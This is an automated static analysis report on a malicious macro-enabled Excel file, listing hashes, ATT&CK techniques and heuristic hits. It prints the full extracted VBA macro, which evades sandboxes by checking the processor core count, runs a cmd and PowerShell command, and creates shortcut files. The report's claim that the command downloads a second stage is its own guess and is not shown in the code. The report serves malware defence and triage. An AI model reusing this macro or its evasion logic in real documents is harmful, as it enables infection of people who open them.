Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6ec2bad0d649e406…

MALICIOUS

Office (OOXML)

Size: 17.9 KB
Created: 2021-05-28 23:44:34 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-06-17
MD5: fb12accbcee26cd5b33e4f0ee7f9d45a
SHA-1: 9fb11119a334c00efb99e3c7cf8b4157e111ff65
SHA-256: 6ec2bad0d649e406c6f37935948de7fff52119a31b26f0a86ec597bc298b4c5e
Risk score: 320

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros that use WScript.Shell and cmd.exe to execute a PowerShell command. The Shell call, 'cmd.exe /c powershell.exe z.hyybat >> o.bat', is reached only when the WMI query of Win32_Processor reports no processor with fewer than 3 cores (a common sandbox check), and is likely responsible for downloading and executing a second-stage payload. The creation of .lnk files suggests an attempt to establish persistence or to facilitate execution of the payload.

Heuristics (7)

  • VBA project inside OOXML | severity: medium | 6 related findings | OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA | severity: critical | OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Else
            Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
        End If
  • WScript.Shell usage | severity: critical | OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
         .Save
  • PowerShell reference in VBA | severity: critical | OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Else
            Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
        End If
  • CreateObject call | severity: high | OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
         .Save
  • GetObject call | severity: high | OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
        Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
  • cmd.exe reference in VBA | severity: high | OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        Else
            Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
        End If

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1492 bytes
SHA-256: ac108f27138472009bfd8704eabc65b2e4d247548cd2a13b49701bbdf348789d
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Private Sub Commandbh1_Click()
    badCores = 0

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
    For Each objItem In colItems
            If objItem.NumberOfCores < 3 Then
                badCores = True
            End If
    Next
    If badCores Then
    Else
        Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
    End If
Dim sShortcutLocation As String

sShortcutLocation = "C:\o.lnk"

With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
     .Save
End With
Dim sShortcutLocations As String

sShortcutLocations = "C:\Users\bjktup\uaz.lnk"

With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocations)
     .Save
End With
End Sub

Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 12288 bytes
SHA-256: 9dfaa0e032a87881aa1d948c68aeb4935b50e57a9cab9ef458708030a8a0387b
emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2748 bytes
SHA-256: ec9cbea9cdcc5da6eea2effa606940bfc3d9e20253018fafee33281fac0b65fe